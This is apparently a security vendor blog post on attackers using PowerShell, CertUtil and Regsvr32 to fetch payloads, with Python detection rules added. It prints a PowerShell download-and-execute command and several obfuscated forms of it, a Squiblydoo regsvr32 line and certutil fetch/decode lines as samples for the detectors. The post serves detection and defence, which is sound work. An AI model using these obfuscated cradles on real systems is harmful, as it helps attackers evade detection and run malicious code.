This is the fourth blog post in a series discussing Living Off the Land tools and techniques. Successful exploitation could allow an adversary to escalate privileges, obtain sensitive information or download additional software.
In this blog post we will focus on tools that can be exploited to download additional payloads.
Living Off the Land tools for exploitation are popular amongst both sophisticated and unsophisticated adversaries. Their use reduces the likelihood of detection and may increase the required investigation time.
In relation to Living Off the Land tools, the exploitation phase covers a very large number of attack methods. For the sake of brevity, this blog post focuses on three tools in particular: PowerShell, CertUtil and Regsvr32.
Unless appropriate steps are taken to both prevent and detect these threats, adversaries will continue exploiting these and similar tools to perform a plethora of malicious activity.
Exploitation is admittedly a broad topic. Two of the most commonly exploited programs that are used to retrieve additional payloads are PowerShell and CertUtil.
PowerShell is a scripting language designed for task automation and configuration management; this tool is extremely flexible and was discussed at length in the first installment of this series, Living Off the Land – The Reconnaissance Phase [1]. In the context of exploitation, PowerShell obfuscation is heavily utilized in order to bypass and circumvent detection methods. It increases the difficulty for incident responders to quickly identify the purpose of the specific command.
CertUtil is a Windows program used to download and update certificates [2]. In the past, adversaries have exploited CertUtil to download additional payloads after enticing users to open weaponized documents.
In 2016, a post-exploitation technique was released that abused regsvr32.exe to download and execute remote files. It was dubbed 'Squiblydoo' and was used to bypass AppLocker and other application whitelisting software. Today Squiblydoo is blocked by default by Windows 10 Home Defender but is still allowed on some versions of Windows 7.
This is by no means an exhaustive list. A more comprehensive list of Living Off the Land tools has been made available on GitHub by various security researchers [3].
PowerShell is able to interpret commands that have been obfuscated to evade detection by security products and incident responders. In the examples below we demonstrate a variety of obfuscation techniques adversaries have often employed. In each example the PowerShell command will download a file from the internet and execute it; the unobfuscated command is shown first.
```powershell
powershell -c "mkdir C:\Temp; (new-object System.Net.WebClient).DownloadFile('\\192.168.0.115\Sharing\test2.ps1','C:\Temp\evil2.ps1'); powershell -f C:\Temp\evil2.ps1"
```

```powershell
.("{1}{0}{3}{2}"-f 'owers','p','l','hel') -c ((("{33}{31}{34}{16}{29}{17}{32}{6}{11}{27}{35}{7}{26}{20}{39}{12}{0}{13}{8}{10}{25}{22}{3}{23}{2}{15}{36}{18}{24}{28}{37}{21}{5}{9}{14}{30}{1}{38}{19}{4}" -f 'dFile','te','ZRQTe','Bbn,B','1','ower','s','ient','R','she','QZRQ19','tem.','oa','(BbnZ','ll -f C','mp',':','mp; ','es','s','.Do','s1Bbn); p','aringZRQtest2.ps1','bnC:','t','2.168.0.115ZRQSh',')','Net.We','2','ZRQTe',':ZRQTempZRQ','k','(new-object Sy','m','dir C','bCl','ZRQt','.p','st2.p','wnl'))."Rep`laCE"(([CHAR]90+[CHAR]82+[CHAR]81),[StRiNg][CHAR]92)."r`ePL`ACe"(([CHAR]66+[CHAR]98+[CHAR]110),[StRiNg][CHAR]39))
```
```powershell
sv ('n'+'209t'+'e') ([cHAr[]]" ))93]RAHc[]GnirTs[,'JPW'(ECalPeR.)29]RAHc[]GnirTs[,'k2B'(ECalPeR.)43]RAHc[]GnirTs[,)37]RAHc[+56]RAHc[+57]RAHc[((ECalPeR.)'IA'+'K'+'1'+'sp.2tsetk2Bpm'+'eTk'+'2B:C '+'f- llehsr'+'ewop ;)JPW1s'+'p.2t'+'set'+'k'+'2Bpm'+'eTk2B:'+'C'+'JP'+'W,J'+'PW1sp.2'+'t'+'s'+'e'+'tk2Bgni'+'rah'+'S'+'k2B511'+'.0.86'+'1.291k2Bk2BJPW(eliF'+'daolnwoD.)t'+'neil'+'Cb'+'eW.t'+'eN.metsy'+'S tcej'+'bo-'+'wen( ;'+'pmeTk2B:C rid'+'kmIAK c- lle'+'h'+'sre'+'wop'( ()'X'+]03[EMOHsp$+]4[emoHSp$ ( ."); [ARrAY]::ReveRSE($N209te) ; IEX( -Join$N209te)
```
```powershell
INvoKE-EXprEssIon(nEW-oBjECt sYSTEM.iO.stREAMReAder((nEW-oBjECt sYsteM.iO.CompREssioN.deFLAtesTReAm([sySTeM.iO.MeMOrYSTreAm] [SYSteM.convErT]::FromBaSe64sTRInG( '7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8iVtVVXjfzvCzT7Wn60eLtrKjTk0e/75t8sTpMt5b51XY1+el82qavr5s2X4xf5O34u/nkpCzyZXtn/LS6WpZVNntWlPnWx7/v77v7cG+8++nBeGe8u3v/9309z+piefH7tnnT7o1Xze7Ho48VuPfZncPUR+Pc9O+afPT/AA=='), [iO.cOMPRESsION.cOmPrEssIOnModE]::Decompress ) ),[sYStEm.TeXT.ENcoDInG]::AScIi)).reaDTOEND( )
```
The PowerShell script 'Invoke-Obfuscation' has been created to automate the obfuscation process [4]. Invoke-Obfuscation allows the user to conceal a PowerShell command's true purpose using a list of pre-defined obfuscation techniques.
The example below shows how difficult it is for an incident responder to determine what the PowerShell command is doing after Invoke-Obfuscation has been applied.
```powershell
powershell -c "mkdir C:\Temp; (new-object System.Net.WebClient).DownloadFile('\\192.168.0.115\Sharing\test2.ps1','C:\Temp\evil2.ps1'); powershell -f C:\Temp\evil2.ps1"
```

```powershell
( neW-OBjEcT iO.ComPressIOn.dEFlaTEStREAM( [systEM.Io.mEmORystREam] [cOnVert]::FrOmBase64StRINg('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' ), [Io.cOmPRESSIon.cOMpReSsionMoDe]::DEComPReSs )|FoREACh{neW-OBjEcT SystEm.IO.sTreAmrEadEr( $_,[Text.eNCoDing]::aSCii) }| fOREAch{ $_.rEaDtOend()} ) |&( $pSHOMe[21]+$PShomE[34]+'x')
```
The above PowerShell command was obfuscated via command token obfuscation, using the “string” and “whitespace” options, concatenating the entire command and then compressing it. The result is a command that is unrecognizable to human eyes but can still be immediately executed by PowerShell.
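As an added illustration (not code from the original post or from eSentire), the following Python scores a PowerShell command line for the obfuscation indicators visible in the samples above; the script-block entries are constructed, and the indicator weights and threshold are assumptions to be tuned against your own telemetry.

```python
"""Heuristic scoring of PowerShell command lines for the obfuscation tricks
shown above: format-operator reordering, backtick-split method names, [char]
arithmetic, reversed strings, Base64 + Deflate payloads, $PSHOME character
indexing and random-case identifiers. Weights and threshold are assumptions."""
import re

# (indicator name, weight, pattern). PowerShell ignores identifier case, so every
# pattern is compiled with re.I; re.S lets ".*" span a command folded over lines.
INDICATORS = [
    ("format_operator", 3, re.compile(r'"(?:\{\d+\}){3,}"\s*-f', re.I)),
    # backtick inside a quoted name that is not a real escape (`n, `t, `r, ...)
    ("backtick_in_name", 3, re.compile(r'"[A-Za-z]*`[^ntrabfveu0\s"]', re.I)),
    ("char_arithmetic", 2, re.compile(r'(?:\[char\]\s*\d+\s*\+?\s*){2,}', re.I)),
    ("reverse_join", 3, re.compile(r'\[array\]::reverse.*-join', re.I | re.S)),
    ("base64_deflate", 3, re.compile(
        r'FromBase64String.*(?:Deflate|GZip)Stream|(?:Deflate|GZip)Stream.*FromBase64String',
        re.I | re.S)),
    ("pshome_indexing", 3, re.compile(r'\$pshome\s*\[\d+\]', re.I)),
    ("invoke_expression", 1, re.compile(r'\b(?:iex|invoke-expression)\b', re.I)),
    ("download_primitive", 2, re.compile(
        r'DownloadFile|DownloadString|Invoke-WebRequest|Net\.WebClient', re.I)),
]
# Casing people actually type: all lower, all upper, camelCase or PascalCase.
NORMAL_CASE = re.compile(r"^(?:[a-z]+|[A-Z]+|[A-Z]?[a-z]+(?:[A-Z][a-z]+)*)$")
OBFUSCATION_THRESHOLD = 5

# Constructed script-block entries: a benign admin command, the plain download
# command from the post, and token skeletons of its three obfuscated forms.
SAMPLE_SCRIPT_BLOCKS = [
    r"Get-ChildItem C:\Users -Recurse | Where-Object { $_.Length -gt 100MB }",
    r"mkdir C:\Temp; (new-object System.Net.WebClient).DownloadFile('\\192.168.0.115\Sharing\test2.ps1','C:\Temp\evil2.ps1'); powershell -f C:\Temp\evil2.ps1",
    r'''.("{1}{0}{3}{2}"-f 'owers','p','l','hel') -c ("x")."Rep`laCE"(([CHAR]90+[CHAR]82+[CHAR]81),[StRiNg][CHAR]92)''',
    r'''sv ('n'+'209t'+'e') ([cHAr[]]"..."); [ARrAY]::ReveRSE($N209te); IEX( -Join$N209te)''',
    r"INvoKE-EXprEssIon(nEW-oBjECt sYSTEM.iO.stREAMReAder((nEW-oBjECt sYsteM.iO.CompREssioN.deFLAtesTReAm([sySTeM.iO.MeMOrYSTreAm] [SYSteM.convErT]::FromBaSe64sTRInG('...'),[iO.cOMPRESsION.cOmPrEssIOnModE]::Decompress)),[sYStEm.TeXT.ENcoDInG]::AScIi)).reaDTOEND()",
]


def random_case_words(cmd):
    """Count alphabetic runs of 4+ letters whose casing is neither flat nor
    camel/Pascal, e.g. 'oBjECt' or 'sYSTEM'; several of these is a strong signal."""
    return sum(1 for w in re.findall(r"[A-Za-z]{4,}", cmd) if not NORMAL_CASE.match(w))


def score_command(cmd):
    """Return (score, [indicator names]) for one PowerShell command string."""
    hits = [name for name, _, pat in INDICATORS if pat.search(cmd)]
    score = sum(weight for name, weight, _ in INDICATORS if name in hits)
    if random_case_words(cmd) >= 3:
        hits.append("random_case")
        score += 2
    return score, hits


def triage(cmd):
    """Coarse verdict: 'obfuscated', 'download' (plain cradle) or 'benign'."""
    score, hits = score_command(cmd)
    if score >= OBFUSCATION_THRESHOLD:
        return "obfuscated"
    return "download" if "download_primitive" in hits else "benign"
```

Run it over Script Block Logging (Event ID 4104) text: an entry that scores as obfuscated is worth a human look regardless of what it decodes to, because a legitimate administrator has no reason to hide a command from the logs.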
CertUtil has been exploited by adversaries to circumvent security products in order to download payloads. As recently as March 2018, CertUtil has been used in the wild in targeted attacks; the technique has been added to the Sanny malware family to download encrypted BAT files [5].
In the example below you can see a base64-encoded file being downloaded from a webserver. Once it has been decoded it can be executed by another program.
Figure 1: CertUtil downloading an external file
Adversaries can still use Regsvr32.exe on some versions of Windows 7 to download and execute files.
The example below shows the ability to download and execute JavaScript embedded inside payload.scr.
Figure 2: Regsvr32 executing JavaScript
There are both broad and specific steps to help defend against the tools discussed in this blog post. Ensuring that employees are aware of ongoing threats and giving them the training to deal with potentially hostile situations strengthens the last line of defence.
The risks associated with Regsvr32 can be minimized by adding firewall rules to deny connections initiated by the Regsvr32.exe process. Process monitoring can also be employed to quickly identify the unusual command-line arguments, modified files or network connections that an adversary may make using CertUtil and Regsvr32 [6].
As discussed in previous blog posts, enabling PowerShell logging can help identify encoded PowerShell commands and record unusual behavior performed by adversaries [7].
In conclusion, Living Off the Land tools are actively being used by adversaries to complete the exploitation stage of their attacks. This minimizes the chances of detection, lessening the time for incident responders to identify and remediate the issue. The ease and effectiveness of the Living Off the Land exploitation tools discussed in this blog make it clear why adversaries are frequently employing these and similar tools. Using the mitigation strategies listed above will help companies to discover and quickly remediate a wide variety of attacks.
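The process-monitoring and logging mitigations above, as an added example that is not eSentire's code: rules over constructed Sysmon-style process-creation and network-connection events that flag certutil fetching or decoding content, regsvr32 loading a remote scriptlet or reaching the network, and PowerShell started with an encoded command. The event field names, the host files.example.test and the address 203.0.113.10 are assumptions.

```python
"""Process-monitoring rules for the mitigations above: certutil fetching or
decoding remote content, regsvr32 loading a remote scriptlet or opening a
network connection, and PowerShell started with an encoded command. The events
are constructed Sysmon-style dicts; field names and hosts are assumptions."""
import re

URL_OR_UNC = re.compile(r"https?://|\\\\[\w.]+\\", re.I)  # http(s) URL or UNC path
ENCODED_ALIASES = {"e", "ec"}  # powershell.exe also takes any prefix of -EncodedCommand


def _tokens(cmdline):
    """Lower-cased arguments with leading '-' or '/' removed, so -f and /f compare equal."""
    return [t.lower().lstrip("/-") for t in cmdline.split()]


def evaluate(ev):
    """Return the list of detection names that fire for one event."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    hits = []
    if ev["EventType"] == "NetworkConnect":
        # Neither tool has a reason to reach the network; a host firewall rule should
        # block regsvr32 outright, and the attempt itself deserves an alert.
        if image in ("regsvr32.exe", "certutil.exe"):
            hits.append("lolbin_network_connection")
        return hits
    cmd = ev["CommandLine"]
    tokens = _tokens(cmd)
    if image == "certutil.exe":
        if "urlcache" in tokens and URL_OR_UNC.search(cmd):
            hits.append("certutil_remote_fetch")    # -urlcache -split -f <url> <file>
        if "decode" in tokens:
            hits.append("certutil_base64_decode")   # base64 text back into a binary
    elif image == "regsvr32.exe":
        # Squiblydoo shape: /i:<remote scriptlet> with scrobj.dll as the "DLL"
        if any(t.startswith("i:") and URL_OR_UNC.search(t) for t in tokens) or "scrobj.dll" in tokens:
            hits.append("regsvr32_remote_scriptlet")
    elif image in ("powershell.exe", "pwsh.exe"):
        if any(t in ENCODED_ALIASES or (len(t) > 1 and "encodedcommand".startswith(t)) for t in tokens):
            hits.append("powershell_encoded_command")
    return hits


def _proc(image, cmdline):
    return {"EventType": "ProcessCreate", "Image": image, "CommandLine": cmdline}


SYS32 = r"C:\Windows\System32"
SAMPLE_EVENTS = [  # constructed; files.example.test and 203.0.113.10 are placeholders
    _proc(SYS32 + r"\certutil.exe", "certutil.exe -urlcache -split -f http://files.example.test/a.txt a.txt"),
    _proc(SYS32 + r"\certutil.exe", "certutil.exe -decode a.txt a.exe"),
    _proc(SYS32 + r"\certutil.exe", r"certutil.exe -verify C:\certs\server.cer"),  # legitimate
    _proc(SYS32 + r"\regsvr32.exe", "regsvr32.exe /s /n /u /i:http://files.example.test/payload.scr scrobj.dll"),
    _proc(SYS32 + r"\regsvr32.exe", r'regsvr32.exe /s "C:\Program Files\App\component.dll"'),  # legitimate
    {"EventType": "NetworkConnect", "Image": SYS32 + r"\regsvr32.exe", "DestinationIp": "203.0.113.10"},
    _proc(SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -nop -w hidden -enc SQBFAFgA"),
]
```

Two of the rules fire on the same host within minutes (a certutil fetch followed by a certutil decode, or a regsvr32 scriptlet load followed by a regsvr32 network connection) is the sequence the blog describes and is a stronger signal than any single hit.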
In the next and final blog post in this series, the focus is on the Living Off the Land tools used in stage six of the Cyber Kill Chain, Command and Control.
Sources
[1] https://www.esentire.com/blog/living-off-the-land-the-reconnaissance-phase/
[2] https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
[3] https://github.com/api0cradle/LOLBAS
[4] https://github.com/danielbohannon/Invoke-Obfuscation
[5] https://threatpost.com/sanny-malware-updates-delivery-method/130803/